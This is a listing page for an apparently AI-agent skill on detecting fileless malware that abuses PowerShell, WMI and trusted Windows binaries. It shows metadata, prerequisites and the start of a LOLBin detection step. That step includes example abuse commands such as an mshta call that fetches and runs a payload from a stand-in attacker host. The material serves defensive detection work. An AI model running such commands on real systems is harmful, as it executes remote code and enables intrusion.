detecting-fileless-malware-techniques

Solid

Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection, registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing traditional executable files to disk. Activates for requests involving fileless threat detection, in-memory malware investigation, LOLBin abuse analysis, or WMI persistence examination.

Category: AI & Automation. 38 stars, 5 forks. Updated yesterday. License: MIT.

Quality Score: 89/100
Breakdown (weight: score): Stars 20%: 53; Recency 20%: 100; Frontmatter 20%: 70; Documentation 15%: 100; Issue Health 10%: 80; License 10%: 100; Description 5%: 100

Skill Content

# Detecting Fileless Malware Techniques

## When to Use

- EDR alerts indicate suspicious behavior from trusted system binaries (PowerShell, mshta, wmic, regsvr32)
- Investigating attacks that leave no traditional malware files on disk
- Analyzing WMI event subscriptions, registry-stored payloads, or scheduled task abuse for persistence
- Building detection rules for LOLBin (Living Off the Land Binary) abuse in enterprise environments
- Memory forensics reveals malicious code but no corresponding files exist on the filesystem

**Do not use** for traditional file-based malware; standard static and dynamic analysis methods are more appropriate for disk-resident malware.

## Prerequisites

- Sysmon installed and configured with comprehensive logging (process creation, WMI events, registry changes)
- PowerShell Script Block Logging and Module Logging enabled
- Volatility 3 for memory forensics of fileless malware artifacts
- Process Monitor (ProcMon) for real-time system activity monitoring
- Windows Event Log access with adequate retention policies
- Autoruns for identifying persistence mechanisms

## Workflow

### Step 1: Identify LOLBin Usage

Detect abuse of legitimate Windows binaries for malicious purposes:

```
Commonly Abused LOLBins and Detection Patterns:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
mshta.exe:
  Abuse: Execute HTA files with embedded VBScript/JScript
  Example: mshta http://evil.com/payload.hta
  Example: mshta vbscript:Execute("CreateObject(""WScript...
```

Details

Author
adriannoes
Repository
adriannoes/awesome-vibe-coding
Created
8 months ago
Last Updated
yesterday
Language
Jupyter Notebook
License
MIT
